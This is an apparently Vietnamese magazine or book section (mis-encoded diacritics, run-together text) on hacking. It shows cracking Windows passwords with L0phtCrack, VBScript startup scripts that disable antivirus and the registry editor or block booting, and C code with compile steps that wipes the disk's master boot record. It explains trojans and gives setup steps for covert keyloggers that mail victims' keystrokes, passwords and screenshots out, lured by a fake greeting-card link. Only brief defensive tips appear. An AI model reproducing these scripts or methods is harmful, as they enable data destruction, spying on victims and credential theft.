http://www.freewebtown.com/vudin-hcuong/L0phtCrack%20.rar

hoaëc http://www.dvpub.com.vnSau khi taûi veà maùy, baïn tieán haønh caøi ñaëtchöông trình. Giao dieän cuûa L0pht crack(xem hình 1.19).

5.2 Caùch thöïc hieän1 Vaøo menu File, choïn LC4 Wizard,

nhaáp Next ñeå tieáp tuïc (xem hình 1.20).

2 Ñaùnh daáu choïn muïc Retrieve fromthe local machine (ñeå tìm taát caûtaøi khoaûn hieän coù cuûa maùy tính). NhaápNextñeå tieáp tuïc.

3 Ñaùnh daáu choïn muïc Custom, sau ñoùnhaáp nuùt Custom Options… Xuaáthieän hoäp thoaïi nhö hình 1.21.

4 Ñaùnh daáu choïn muïc Perform a"Dictionary attack" on the pass-word. Nhaáp vaøo nuùt Dictionary list(neáu muoán Crack baèng töø ñieån) (xemhình 1.22).

5 Nhaáp nuùt Editñeå theâm caùc töø môùi vaøotöø ñieån coù saün hoaëc nhaáp vaøo nuùt Newñeå taïo töø ñieån môùi, sau ñoù nhaáp Add.

Hình 1.17: Crack Password baèng töø ñieån

Hình 1.19: Giao dieän cuûa L0pht crack

Hình 1.20: Tìm taát caû Account trong maùy tính

Hình 1.18: Quaù trình Crack Password thaønh coâng



http://www.freewebtown.com/vudin-


PC 13

Töø ñieån coù caáu truùc nhö sau (xem hình1.23).

6 Nhaán toå hôïp phím Ctrl+ Sñeå löu, sauñoù ñoùng notepad ñeå trôû laïi chöôngtrình.

7 Ñaùùnh daáu choïn muïc Perform"Hybrid" Dictionary attack, Perform

"Brute a "Force Attack" on the pass-words(crack baèng caùc kyù töï töø A..Z,0..9). Nhaáp OK. Nhaáp Nextñeå tieáp tuïc(xem hình 1.24).

8 Ñaùùnh daáu choïn vaøo caùc muïc:o Display passwords when audited:

Hieån thò password khi keát thuùc quaùtrình kieåm tra.

o Display how long it took to auditeach password: Hieån thò caùch thöùclaáy password.

o Display Auditing method: Hieån thòphöông thöùc laáy password.Nhaáp Next > Finish ñeå thöïc hieäncrack. Keát quaû sau khi quaù trình crackhoaøn taát nhö sau (xem hình 1.25).

Hình 1.21: Thieát laäp caùc löïa choïn

Hình 1.22: Soaïn thaûo töø ñieån

Hình 1.25: Quaù trình crack hoaøn taát

Hình 1.24: Caùc muïc hieån thò khi Password ñöôïc tìmthaáy

Hình 1.23: Caáu truùc cuûa töø ñieån



II. GIÔÙI THIEÄU MOÄT SOÁ SCRIPTSÑaây laø caùc ñoaïn Scripts giuùp baïn kieåm soaùt toaøn boä heä thoáng baèng caùch ñaët moät file

(*.vbs) naèm trong thö muïc Start up.

1. Khoâng cho khôûi ñoäng maùy Dim wshSet wsh = createobject("wscript.shell")wsh.run "RUNDLL32.EXE user.exe,exitwindows"

2. Disable NAV (neáu coù install) Dim wshSet wsh= CreateObject("WScript.Shell") s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ Norton Program Scheduler\Start" wsh.RegWrite s1,3, "REG_DWORD"

3. Hieån thò message moãi khi reboot maùydim wshSet wsh = CreateObject("WScript.Shell" ) s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\"s2 = "LegalNoticeCaption"s3 = "LegalNoticeText"wsh.RegWrite s1+s2, "Hackervn.org"wsh.RegWrite s1+s3, "Robinhood invite you to join hackervn.org"

4. Hieån thò doøng leänh moãi khi nhaáp vaøo moät file hay folderset reg=createobject("WScript.shell")reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\Hello I am Robinhood-come from hack-

ervn.org\",""reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hello I am Robinhood-come from

hackervn.org\","Robinhood"

5. Disable Registry Dim objShellSet objShell = CreateObject("WScript.Shell" )s1 = "HKEY_USERS\.Default\Software\Microsoft\Windows\ CurrentVersion\"s2 = "Policies\System\DisableRegistryTools" objShell.RegWrite s1+s2,1, "REG_DWORD"

6. Chöông trình xoùa Master bootSau ñaây, toâi giôùi thieäu ñeán baïn moät chöông trình Clearmtb.cpp. Baïn coù theå duøng moät

trình soaïn thaûo vaên baûn vaø nhaäp vaøo ñoaïn code sau, sau ñoù duøng C/C++ ñeå bieân dòch.

14 PC



PC 15

Chuù yù: Ñaây laø ñoaïn code raát nguy hieåm khi noùñöôïc chaïy thì master boot treân ñóa cöùng seõbò phaù huûy. Ñaây laø ñoaïn code Assemblerñöôïc nhuùng trong ngoân ngöõ Borland C. Baïnkhoâng neân chaïy treân maùy vì neáu chaïy roàithì baïn chæ coù caùch laø fdisk laïi oå cöùng cuûamình vaø taát nhieân laø döõ lieäu seõ maát heát.Vì ñaây laø ñoaïn code raát nguy hieåm, caùc baïnkhoâng neân phoå bieán noù.Neáu muoán bieân dòch noù, baïn coù theå laømnhö sau:1 Môû trình bieân dòch Borland C vaø chaïy

file bc.exe2 Vaøo File > New.3 Nhaäp ñoaïn maõ sau vaøo.

char far *mbr; void writembr(){ _asm { asm mov ax,0x0301 // func 03 read

sectors asm mov dl,0x80 // 0x80=harddisk 0,

0x81=harddisk 1... asm mov dh,0 // sizde 0 asm mov ch,0 // cylinder 0 asm mov cl,1 // sector 1 asm les bx,mbr asm int 0x13

} } void main() { mbr = new char[512]; mbr[0x1bf] = 0; writembr(); }

4 Sau khi nhaäp xong, nhaán phím F2ñeålöu (teân file DelMbr.cpp), nhaán F9ñeåkieåm tra loãi.

5 Neáu chöông trình khoâng coù loãi, nhaántoå hôïp phím Ctrl+ F9ñeå bieân dòch noùra file DelMbr.exe.

III. TROJAN-VIRUS-WORMI. Caên baûn veà Trojan

1.1 Theá naøo laø Trojan?Trojan laø moät chöông trình baát hôïp

phaùp chöùa beân trong moät chöông trình hôïpphaùp. Chöông trình naøy thöïc hieän nhöõnghaøm bí maät gaây nguy hieåm beân trong heäthoáng.

Ngaøy nay, trojan luoân laø vaán ñeà lôùntrong baûo maät vaø an toaøn treân maïng. Nhieàungöôøi khoâng bieát trojan laø gì vaø hoï taûixuoáng nhöõng file maø khoâng bieát roõ nguoàngoác. Hieän nay coù hôn 1000 trojan vaø coøn raátnhieàu nöõa. Vì moãi Hacker, laäp trình vieânhay moãi nhoùm Hacker ñeàu vieát trojan rieângcho mình vaø nhöõng trojan naøy seõ khoângñöôïc coâng boá leân maïng cho ñeán khi noù bòphaùt hieän.

Khi moät ngöôøi baét ñaàu hoïc "Winsock",ñaàu tieân hoï taïo ra moät chöông trình chathay moät con trojan. Thaäm chí moät chuyeân

vieân antivirus cuõng coù theå bò nhieãm trojancuûa chính mình hay cuûa moät hacker naøoñoù.

1.2 Chöông trình choáng virusNhieàu ngöôøi nghó raèng khi ñaõ sôû höõu

moät chöông trình queùt virus toát vaø coù baûncaäp nhaät môùi nhaát thì seõ an toaøn vaø maùy seõkhoâng bò nhieãm trojan hay khoâng theå truycaäp vaøo maùy tính. Ñieàu naøy hoaøn toaøn sai.Muïc ñích cuûa chöông trình choáng virus laøphaùt hieän nhöõng virus môùi chöù khoâng phaûilaø trojan.

Nhöõng chöông trình queùt virus naøykhoâng phaûi laø Firewall. Vì vaäy, noù seõ khoângphaùt hieän ra trojan cuõng nhö baûo veä antoaøn cho baïn khi ñang keát noái Internet.



16 PC

Ñoái vôùi moät soá chöông trình queùt viruschæ coù theå dieät ñöôïc nhöõng loaïi trojan thoângduïng vaø ñöôïc coâng boá roäng raõi treân maïng.Vì vaäy, ñeå maùy tính luoân an toaøn thì baïnphaûi luoân kieåm tra caùc chöông trình ñangchaïy trong maùy tính baèng tieän ích TaskManager trong theû Processes, khi phaùt hieänmoät chöông trình laï, baïn phaûi taét ngay vaøduøng caùc chöông trình queùt trojan môùi caäpnhaät ñeå queùt.

1.3 Toâi bò nhieãm trojan nhö theá naøo?Baïn coù theå bò nhieãm trojan töø moät trong caùcnguoàn sau ñaây:Töø IRC (Internet Relay Chat)

IRC laø phoøng chat coâng coäng, nôi moïingöôøi coù theå troø chuyeän vôùi nhau thoângqua caùc thoâng ñieäp ñöôïc trao ñoåi töø baønphím.Cuõng töø tieän ích naøy maø nhieàu ngöôøi ñaõ bònhieãm trojan. Ví duï, khi baïn ñang chat vôùimoät ai ñoù vaø baát ngôø nhaän ñöôïc moät file,ngay laäp töùc baïn download chöông trình ñoùveà vaø chaïy noù nhö nhöõng chöông trìnhkhaùc. Baïn khoâng bieát raèng chöông trìnhvöøa chaïy ñaõ ñöôïc ñính trojan. Vì vaäy, tröôùckhi chaïy moät chöông trình naøo, baïn phaûixem xeùt kyõ vaø hieåu roõ nguoàn goác cuûa taäptin, neáu phaùt hieän maùy cuûa baïn chaïy chaämhôn bình thöôøng thì phaûi kieåm tra laïi caùctaäp tin vöøa chaïy.Töø Mail

Chaéc baïn cuõng bieát coù nhieàu trojans, virusñöôïc laây lan baèng mail vaø toác ñoä laây lan raátnhanh. Moät caùch ñôn giaûn vaø thöôøng duønglaø trojan seõ laáy ñòa chæ mail trong Addressbook ñeå phaùt taùn cho nhöõng ngöôøi baïn cuûabaïn. Ngay baây giôø, baïn haõy caøi moät chöôngtrình ñeå coù theå kieåm tra mail tröôùc khidownload veà vaø kieåm tra nhöõng mail ñöôïcsend ra ngoaøi (Bkav 2006).Truy caäp tröïc tieáp

Ñeà phoøng nhöõng tröôøng hôïp truy caäp tröïctieáp. Ví duï, khi coù moät khaùch ñeán chôi thìbaïn phaûi kieåm tra maùy tính cuûa baïn sau khingöôøi khaùch ñoù veà, beân caïnh ñoù baïn cuõngthöïc hieän coâng vieäc kieåm tra lieân quan ñeán

döõ lieäu…Löu yù:Baïn phaûi luoân kieåm tra nhöõng chöông trìnhhay nhöõng taäp tin hay taøi lieäu ñöôïc taënghay cho, vì nhöõng taøi lieäu ñoù cuõng laø moätnguyeân nhaân daãn ñeán maùy cuûa baïn bònhieãm trojan.

1.4 Trojan nguy hieåm nhö theá naøo?Nhieàu ngöôøi khoâng bieát trojan laø gì thì nghóraèng khi thöïc thi chuùng, hoï khoâng thaáyñieàu gì xaûy ra hoaëc khoâng coù gì nguy hieåm.Bôûi vì maùy tính vaãn laøm vieäc vaø taát caû döõlieäu vaãn coøn ñoù. Neáu ñoù laø virus thì coù theåmaát döõ lieäu hay maùy ngöng hoaït ñoäng.Khi maùy baïn bò nhieãm trojan, taát caû döõ lieäutreân maùy ñeàu coù theå bò nguy hieåm, thöôøngthì hacker khoâng xoùa taát caû hoà sô naøy maøhoï seõ cheùp veà khai thaùc nhö taøi lieäu bí maätcuûa coâng ty, taøi khoaûn Internet, credit cardhoaëc coù theå xoùa döõ lieäu treân maùy. Ñoâi khi,hacker coøn duøng trojan ñeå caøi ñaët virus phaùhoaïi nhö CIH chaúng haïn. Ñoù laø moät vaøitröôøng hôïp hacker coù theå thöïc hieän khi hoïñaõ caøi thaønh coâng trojan.

1.5 Coù bao nhieâu loaïi trojan?Coù raát nhieàu trojan nhöng chuû yeáu ñöôïcchia laøm caùc daïng cô baûn sau: Trojan duøng ñeå truy caäp töø xa

Hieän nay, trojan loaïi naøy ñöôïc söû duïng raátnhieàu. Chöùc naêng chính cuûa trojan laø môûmoät coång treân maùy naïn nhaân ñeå hacker coùtheå quay laïi truy caäp vaøo maùy naïn nhaân.Nhöõng trojan naøy raát deã söû duïng, chæ caànnaïn nhaân bò nhieãm trojan vaø hacker coù IPthì hacker ñaõ coù theå truy caäp toaøn quyeàntreân maùy ñoù. Tuøy vaøo töøng loaïi trojan maøchöùc naêng cuûa noù khaùc nhau (keylogger,download, upload file, thöïc hieän leänh), baïnphaûi ñoïc kyõ höôùng daãn ñeå söû duïng hieäuquaû taát caû chöùc naêng naøy.Hieän coù nhieàu con trojan noåi tieáng thuoäcloaïi naøy nhö: netbus, back orifice...Keylogger

Trojan naøy ghi laïi taát caû haønh ñoäng treânbaøn phím roài göûi veà cho hacker khi naïn



PC 17

nhaân online.Ví duï: kuang keylogger.Trojan göûi maät khaåu

Loïc taát caû maät khaåu löu trong cache vaøthoâng tin veà maùy naïn nhaân roài göûi veà chohacker moãi khi naïn nhaân online. Ví duï: barok, kuang, bario,…Trojan phaù huûy

Nhöõng con trojan naøy chæ coù moät nhieäm vuïduy nhaát laø kill, nghóa laø tieâu dieät taát caû filetreân maùy (ví duï: file.exe,.dll,.ini...)Trojan naøy raát nguy hieåm vì khi maùy bònhieãm moät laàn thì taát caû döõ lieäu maát heát.FTP trojan

Loaïi trojan naøy seõ môû coång 21 treân maùy ñeåtaát caû moïi ngöôøi keát noái ñeán maùy tính cuûabaïn maø khoâng coù maät khaåu vaø coù toaønquyeàn taûi baát kyø döõ lieäu naøo xuoáng. Ñaây laønhöõng loaïi trojan thöôøng ñöôïc söû duïngnhaát.

1.6 Hacker tìm kieám nhöõng gì treân maùy tính Nhieàu ngöôøi nghó raèng hacker duøng tro-

jan chæ ñeå phaù hoaïi ñieàu ñoù hoaøn toaøn sailaàm. Trojan laø moät ñieäp vieân raát höõu hieäugiuùp hacker tìm ñöôïc raát nhieàu thoâng tintreân maùy cuûa naïn nhaân nhö:

o Thoâng tin veà Credit Card. o Tìm kieám thoâng tin account treân

Server.o Account treân caùc Server khaùc.o Döõ lieäu bí maät.o Danh saùch ñòa chæ mail.o Ñòa chæ nhaø rieâng.o Account Passwords.o Thoâng tin veà khaùch haøng.o Taát caû nhöõng thoâng tin cô maät coâng

ty.

1.7 Trojan hoaït ñoäng nhö theá naøo?Khi naïn nhaân chaïy file nhieãm trojan,

neáu laø trojan truy caäp töø xa (remote access), file Server seõ luoân ôû cheá ñoä chôø. Noù seõchôø, chôø cho ñeán khi nhaän tín hieäu cuûaClient, ngay laäp töùc noù seõ môû ngay moät

coång naøo ñoù ñeå hacker coù theå truy caäp vaøo.Noù söû duïng giao thöùc TCP hay UDP.

Khi keát noái vaøo IP cuûa naïn nhaân, baïncoù theå laøm baát kyø ñieàu gì baïn muoán vì tro-jan ñaõ bao haøm nhöõng leänh treân. Moät vaøitrojan ñöôïc naïp ngay khi Windows ñöôïckhôûi ñoäng baèng caùch söûa file win.ini, sys-tem.ini hay söûa registry.Moät vaøi coång cuûa Trojan thoâng duïng

Satanz Backdoor|666Silencer|1001Shivka-Burka|1600SpySender|1807Shockrave|1981WebEx|1001Doly Trojan|1011Psyber Stream Server|1170Ultors Trojan|1234VooDoo Doll|1245FTP99CMP|1492BackDoor|1999Trojan Cow|2001Ripper|2023Bugs|2115Deep Throat|2140The Invasor|2140Phineas Phucker|2801Masters Paradise|30129Portal of Doom|3700WinCrash|4092ICQTrojan|4590Sockets de Troie|5000Sockets de Troie 1.x|5001Firehotcker|5321Blade Runner|5400Blade Runner 1.x|5401Blade Runner 2.x|5402Robo-Hack|5569DeepThroat|6670DeepThroat|6771GateCrasher|6969



PC 19

ProgenicTrojan | 11223Prosiak 0.47 | 22222RemoteWindowsShutdown | 53001RoboHack |5569Silencer | 1001Striker | 2565TheSpy | 40412TrojanCow | 2001UglyFtp | 23456WebEx |1001Backdoor | 1999Phineas | 2801Psyber Streaming Server | 1509Indoctrination | 6939Hackers Paradise | 456Doly Trojan | 1011FTP99CMP | 1492Shiva Burka | 1600Remote Windows Shutdown | 53001BigGluck, | 34324NetSpy DK | 31339iNi-Killer | 9989ICQKiller | 7789Portal of Doom | 9875Firehotcker | 5321Master Paradise |40423BO jammerkillahV | 121

1.8 Laøm sao ñaùnh löøa naïn nhaân (victim)? Moät vaøi phöông phaùp ñöôïc Hacker öùngduïng ñeå caøi ñaët Trojan leân maùy naïn nhaânnhö:

+ Duøng Godwill, Godmessage ñeå löutrojan vaøo trong mail, trang web. Khi naïnnhaân môû mail, trang web thì seõ töï ñoängnhieãm trojan.

+ Ñính file trojan vaøo trong moät chöôngtrình. Coù raát nhieàu coâng cuï ñöôïc söû duïngnhö bind, joiner.... baïn coù theå downloadchuùng taïi:

www.freewebtown.com/vudinhcuong/joiner.zip hoaëchttp://www.dvpub.com.vn

+ Caùch hay nhaát laø hack moät serverdownload file quan troïng, uy tín, nhieàungöôøi duøng, ñính file trojan vaøo trongnhöõng file naøy vaø tìm kieám naïn nhaân.

+ Vaøo ICQ, MIRC ñeå ñaùnh löøa naïnnhaân.

...

1.9 Laøm theá naøo ñeå choáng Trojan?Nhö ñaõ ñeà caäp ôû treân, khoâng phaûi baát

kyø chöông trình choáng virus naøo cuõng coùtheå dieät ñöôïc trojan. Sau ñaây laø moät vaøicaùch thoâng thöôøng, ñôn giaûn giuùp baïnchoáng trojan hieäu quaû:

- Söû duïng nhöõng chöông trình choángvirus, trojan môùi nhaát cuûa nhöõng haõng ñaùngtin caäy (AVP, Mscafe, D32 môùi nhaát, Bkav2006...).

- Moãi khi taét maùy, trojan cuõng taét vaø noùseõ khôûi ñoäng laïi ngay khi maùy ñang loadwindows. Noù khoâng töï khôûi chaïy maø phaûisöûa file win.ini, system.ini hay löu vaøo trongregistry. Vì theá, baïn phaûi luoân luoân kieåm tranhöõng file naøy. Coâng cuï söû duïng toát nhaáttrong windows 98/XP/2003 laø söû duïng leänhmsconfig. Baïn chæ caàn vaøo hoäp thoaïi Run,goõ msconfig. Thöôøng thì nhieàu trojan ñöôïclöu trong thö muïc \windows hay \win-dows\system.

o Nhieàu trojan khoâng theå daáu ñöôïc khibaïn nhaán Ctrl+Alt+Del, baïn neân nhaán 3phím naøy ñeå kieåm tra xem coù gì laï khoâng.

o Söû duïng chöông trình scan port ñeåkieåm tra treân maùy coù môû coång naøo laïkhoâng. Neáu noù khoâng naèm trong nhöõngcoång thoâng thöôøng hay naèm trong nhöõngcoång lieät keâ treân thì chaéc raèng maùy baïn ñaõbò nhieãm trojan.

o Khoâng download file töø nhöõng nguoànkhoâng roõ hay nhaän mail cuûa ngöôøi laï. Toátnhaát laø duøng chöông trình check mail ngaytreân server, thaáy an toaøn roài môùi load veà.

o Söû duïng moät soá chöông trình coù theåquan saùt tröïc tieáp maùy cuûa baïn vaø laäpFirewall nhö lockdown, log monitor,PrcView…

o Tröôùc khi chaïy caùc file laï neân kieåm tra



http://www.freewebtown.com/vudinhcuong/


20 PC

tröôùc.

2. Tìm hieåu moät vaøi Trojan thoâng duïng2.1 Trojan Elite Keylogger Editor V 1.0*Giôùi thieäuÑaây laø moät trojan töông ñoái nguy hieåm, khibaïn göûi cho naïn nhaân (victim) vaø victimkhôûi chaïy thì ngay laäp töùc moïi thao taùc treânbaøn phím cuûa victim seõ göûi vaøo ñòa chæ e-mail cuûa baïn. Baïn chæ caàn check mail vaølaáy caùc thoâng tin do trojan naøy göûi veà. Giaodieän chöông trình nhö sau (xem hình 3.1).

* Caùc chöùc naêng:o Khoâng hieån thò treân task manager khi

xöû lyù.

o Tröïc tieáp nhieãm vaøo file Explorer.exe.o Khoâng hieån thò trong muïc Startup hay

msconfig.o Töï ñoäng ñöôïc caøi ñaët vaø göûi password

cho chuû nhaân.o Khoâng caàn sôû höõu SMTP.o Coù chöùc naêng caøi ñaët töø xa.o Xaây döïng file keylogger.exe.o Doø tìm ICQ/MSN/AOL/Yahoo Chats.o Ghi laïi taát caû thao taùc treân baøn phím.o Kích thöôùc file exe laø 12.7 KB.

* Caùch söû duïng:Böôùc 1:Nhaäp vaøo ñòa chæ E-mail sau ñoù chæñònh kích thöôùc cuûa file log (maëc ñònh laø 5KB), nhaáp Get MX > Test.

Böôùc 2: Ñaùnh daáu choïn vaøo muïcAutomatic Uninstallñeå khi trojan xaâmnhaäp heä thoáng khoâng ñeå laïi daáu veát maø töïñoäng gôõ boû, sau ñoù nhaäp vaøo ngaøy thaùngñeå trojan töï aån mình (xem hình 3.2).

Tieáp tuïc ñaùnh daáu choïn muïc SendPasswords, chæ ñònh soá ngaøy ñeåKeylogger göûi password trong muïc Send

Pass Every.Böôùc 3: Soaïn thaûo moät file *.htm, töø giaodieän chính cuûa chöông trình, nhaáp Browseñeå daãn ñeán file *.htm (ví duï: thiephoa.htm).Böôùc 4:Nhaáp Makevaø ñôïi giaây laùt.Tröôøng hôïp naøy, baïn neân ñính keøm Trojannaøy vaøo trong file *.htm, sau ñoù upload leânwebsite baát kyø (ví duï www.freewebtown.com. Treân trang naøy, baïn neân taïo moätaccount ñeå upload). Böôùc 5:Göûi link download file *.htm maøbaïn ñaõ upload tröôùc ñoù ñeán ngöôøi ñangchat vôùi baïn. Vaø laøm theá naøo ñeå ngöôøi baïnñoù môû file thì baïn neân tham khaûo theocaùch sau:Ví duï: Toâi seõ göûi cho victim doøng giôùi thieäusau:Baïn haõy nhaáp vaøo ñaây ñeå nhaän thieäp hoa:www.freewebtown.com/managerdocu-ment/thiephoa.htm.Vì file thiephoa.htm toâi ñaõ ñính con trojanvaøo ñoù. Luùc naøy, Trojan seõ töï ñoäng caøi ñaëttreân maùy cuûa victim. Tieáp theo laø vaán ñeàchôø ñôïi vaø nhaän tin (xem hình 3.3).

Hình 3.1: Giao dieän cuûa Elite Keylogger

Hình 3.2: Caùc thieát laäp trong muïc Settings



http://www.freewebtown

http://www.freewebtown.com/managerdocu-

PC 21

2.2 Trojan Blazing Tools Perfect Keylogger

* Giôùi thieäuTrong muïc naøy, toâi seõ giôùi thieäu moät tro-

jan voâ cuøng noåi tieáng ñoù laø Blazing ToolsPerfect Keylogger. Ñaây laø trojan Remotecontrol, noù coù theå göûi cho baïn nhöõng gì noùghi ñöôïc trong moãi giaây, moãi phuùt…., giaodieän chöông trình nhö sau (xem hình 3.4).

* Caùc chöùc naêng vaø caùch thöïc hieän:Böôùc 1:Tieán haønh caøi ñaët nhö moät phaànmeàm bình thöôøng, sau khi caøi ñaët, xuaáthieän bieåu töôïng treân System tray. Böôùc 2:Nhaáp phaûi chuoät vaøo bieåu töôïng,choïn Option… Muïc Option coù giao dieännhö hình 3.5.Böôùc 3:Trong khung General, ñaùnh daáuchoïn moät trong caùc muïc sau:o Run on Windows Startup: Neáu muoánchöông trình khôûi ñoäng cuøng Windows.

o Don't show program icon at startup:Khoâng hieän chöông trình khi khôûi ñoäng.o Hide the program from Ctrl+Alt+Del:AÅn chöông trình khi ngöôøi duøng nhaán phímCtrl+Alt+Del.o Make the program invisible in thewindows startup list: Khoâng hieån thòchöông trình trong thö muïc Startup.o Remove the program from start menuand uninstall list: Loaïi boû chöông trình.Böôùc 4: Trong khung Logging, nhaápPassword … ñeå ñaët password chöôngtrình. Password naøy duøng ñeå ñaêng nhaäp vaøchæ coù ngöôøi coù password naøy môùi coù theåmôû ñöôïc keylogger. Ñaùnh daáu choïn moättrong caùc muïc sau:o Monitor only online activity (disablekeylogger when computer offline): Theodoõi maøn hình maùy tính khi ñang online.o Enable chat logging (capture AOL/ICQ/AIM/Yahoo chat): Chuïp maøn hìnhchat.o Include non character keys in the log:Ghi laïi taát caû kyù töï bao goàm kyù töï khoaûngtraéng.

Trong muïc naøy, baïn cuõng coù theå xemfile log baèng caùch nhaáp vaøo nuùt View Log.Xoùa noäi dung, nhaáp nuùt Clear log. Thayñoåi vò trí, nhaáp nuùt Change log location…(xem hình 3.6).Böôùc 5: Muïc Screenshorts neáu ñöôïc choïnthì cöù sau moät khoaûng thôøi gian nhaát ñònh(khoaûng thôøi gian naøy do baïn quy ñònh,maëc ñònh laø 5 phuùt) noù seõ chuïp maøn hìnhDesktop. Thöïc hieän caùc thao taùc treân muïcnaøy nhö sau:1 Ñaùnh daáu choïn muïc Enable visualSurveillance(baät tính naêng theo doõimaøn hình). Sau ñoù thieát laäp thôøi gianchuïp maøn hình Desktop.

2 Keùo thanh tröôït ñeå tuøy chænh chaátlöôïng hình aûnh. Baïn coù theå nhaän hìnhaûnh theo hai kieåu Full screen (ñaàymaøn hình) hay Active Windows(chuïptheo cöûa soå hoaït ñoäng cuûa chöôngtrình).

Hình 3.4: Giao dieän cuûa Blazing Tools PerfectKeylogger

Hình 3.3: Ñính Trojan vaøo file thiephoa.htm



22 PC

3 Ñaùnh daáu choïn muïc Delete after, ñònhthôøi gian ñeå xoùa caùc hình aûnh naøy(maëc ñònh laø 3 ngaøy) (xem hình 3.7).

Böôùc 6:Trong phaàn E-mail, nhaäp ñòa chæ

mail ñeå Keylogger göûi thoâng tin ñeán cho

baïn. Thieát laäp caùc thuoäc tính nhö sau:* Theû Scheduler(laäp lòch):1 Ñaùnh daáu choïn muïc Try to sendlog by e- mail everyvaø ñònh thôøi gian

ñeå chöông trình göûi mail cho baïn (thôøigian maëc ñònh laø 30 phuùt).

2 Ñaùnh daáu choïn caùc muïc Text log(kyùtöï baøn phím), Chat log(theo doõi muïcchat), Web log(caùc trang web victimtruy caäp), Visual log(hình aûnh chuïpñöôïc). Baïn coù theå choïn caùc loaïi ñònhdaïng file log: HTML hay Encrypted(file ñöôïc maõ hoùa).

3 Tieáp tuïc ñaùnh daáu choïn muïc Sendonly when log size is more thanvaønhaäp kích thöôùc chæ ñònh cho file log,chöông trình maëc ñònh laø 1000 KB.Nhaáp choïn vaøo muïc Clear logs aftersuccessful sending(xoùa noäi dung filelog khi göûi thaønh coâng) (xem hình3.8).

*Theû Delivery:

1 Nhaäp ñòa chæ E-mail vaøo muïc Send to. 2 Nhaäp soá coång trong muïc Port Number,

maëc ñònh laø coång 25 (xem hình 3.9).Böôùc 7:Nhaáp OKñeå hoaøn taát.

Hình 3.8: Laäp lòch chöông trình

Hình 3.9: Theû Delivery

Hình 3.7: Screenshorts

Hình 3.5: Muïc Option…

Hình 3.6: Muïc Logging



PC 23

Ñeán ñaây, baïn ñaõ coù moät trojan thaät lôïi haïiroài ñoù.

2.3 Tìm hieåu veà Trojan Remote Anything* Giôùi thieäu

Ñaây laø moät loaïi Trojan ñieàu khieån töø xa,chöông trình bao goàm baûng Slave vaøServer. Baûng Server khi ñöôïc khôûi ñoäng noùluoân ôû traïng thaùi laéng nghe caùc keát noái(connection). Khi baûng Slave ñöôïc khôûiñoäng seõ taïo ra moät baûng coù teân laømy_slave.exe trong thö muïc c:\windows\,sau ñoù keát noái ñeán Server. Luùc naøy, Serverseõ laéng nghe vaø ñöa vaøo haøng ñôïi thoângñieäp treân moät danh saùch.

Trojan naøy töông thích vôùi moïiWindows, baïn coù theå download taïi:

www.freewebtown.com/vudinhcuong/remoteanything.zip hoaëchttp://www.dvpub.com.vn

* Caùc chöùc naêng vaø caùch thöïc hieänBaûn Slave

Khi chöông trình naøy ñöôïc khôûi ñoäng, noùseõ keát noái ngay ñeán Server vaø ñöôïc hieån thòtreân System tray. Vôùi bieåu töôïng hình voøngtroøn, neáu baïn muoán tinh chænh caùc caáuhình, nhaáp phaûi chuoät vaøo bieåu töôïng naøy,choïn Option… (xem hình 3.10).1 Baïn nhaäp caùc thoâng soá sau treân baûn

Slave:° Nhaäp soá coång keát noái trong muïc Port.° Nhaäp Password truy caäp trong muïc

Password.

° Nhaáp vaøo muïc Accept/Reject in-coming connection manually.2 Nhaáp nuùt Create My_Slaveñeå taïo moät

client connection.3 Nhaáp Applyñeå aùp duïng caùc thieát laäp.4 Ngoaøi ra, baïn coù theå cho client göûi caùc

thoâng baùo ñeán E-mail cuûa baïn baèngcaùch:

° Nhaáp choïn Email Notification, sau ñoùnhaäp ñòa chæ mail vaøo muïc Emailaddress.

° Nhaäp SMTP Server vaøo muïc SMTPServer(xem hình 3.11).

Nhaáp Applyñeå aùp duïng caùc thieát laäp.

Baûn ServerKhi baûn Server ñöôïc khôûi ñoäng, noù seõ laéngnghe caùc keát noái, neáu baïn khoâng muoán ñôïilaâu coù theå nhaáp nuùt ñeå Server tìmcaùc client ñang keát noái ñeán noù (xem hình3.12).

Hình 3.11: Göûi thoâng baùo qua E-mail

Hình 3.10: Giao dieän baûng Client

Hình 3.12: Giao dieän cuûa Server



http://www.freewebtown.com/vudinhcuong/


24 PC

-Ñeå xem caùc caáu hình phaàn cöùng cuûa maùynaïn nhaân (Victim), choïn IP caàn keát noáiñeán, sau ñoù nhaáp nuùt ñeå xem(xem hình 3.13).-Baïn coù theå xem ñöôïc dung löôïng oå ñóacoøn troáng, toång soá oå ñóa vaø caùc taäp tin heäthoáng cuûa maùy Victim (xem hình 3.14).

-Baïn coù theå chat vôùi Victim baèng caùchnhaáp vaøo nuùt (xem hình 3.15).-Baïn coù theå Log off, Shutdown, Wake onLAN, Reboot, Lock up, maùy tính cuûa Victimbaát cöù luùc naøo maø baïn thích (ôû löïa choïncuoái maøn hình (xem hình 3.16).* Moät soá giaûi phaùp choáng laây nhieãmTrojan treân maùy tính:

Khi maùy tính bò nhieãm trojan, luùc ñoù heäthoáng phaûi laøm vieäc nhieàu. Baïn döïa vaøoñaây ñeå kieåm tra thoâng soá laøm vieäc cuûaCPU, neáu CPU hoaït ñoäng treân 50% thì caànphaûi chuù yù ñeå phaùt hieän kòp thôøi caùc

chöông trình laï ñoàng thôøi voâ hieäu hoùa noùbaèng caùch taét hoaëc duøng caùc chöông trìnhqueùt trojan thoâng duïng vôùi phieân baûn caäpnhaät môùi.

Ñeå taét caùc chöông trình naøy, nhaán toåhôïp phím Ctrl + Alt+ Delhoaëc nhaáp phaûichuoät treân thanh Task bar ñeå môû tieän íchTask Manager hoaëc khi baïn thaáy bieåutöôïng treân system tray, baïn phaûi thoaùtnoù ngay tröôùc khi thöïc hieän thao taùc trongheä thoáng baèng caùch nhaáp phaûi chuoät vaøobieåu töôïng, choïn Exit.

Neáu baïn söû duïng heä ñieàu haønhWindows maø khoâng muoán maùy bò nhieãmcaùc phaàn meàm giaùn ñieäp neân töø choái môûfile ñính keøm vaø duyeät web vôùi trình duyeätFirefox hoaëc Opera thay cho InternetExplorer.

Hình 3.13: Xem caáu hình phaàn cöùng cuûa maùy Victim

Hình 3.14: Xem caùc taäp tin caáu hình cuûa VictimHình 3.16: Log off maùy Victim

Hình 3.15: Chat vôùi Victim



PC 25

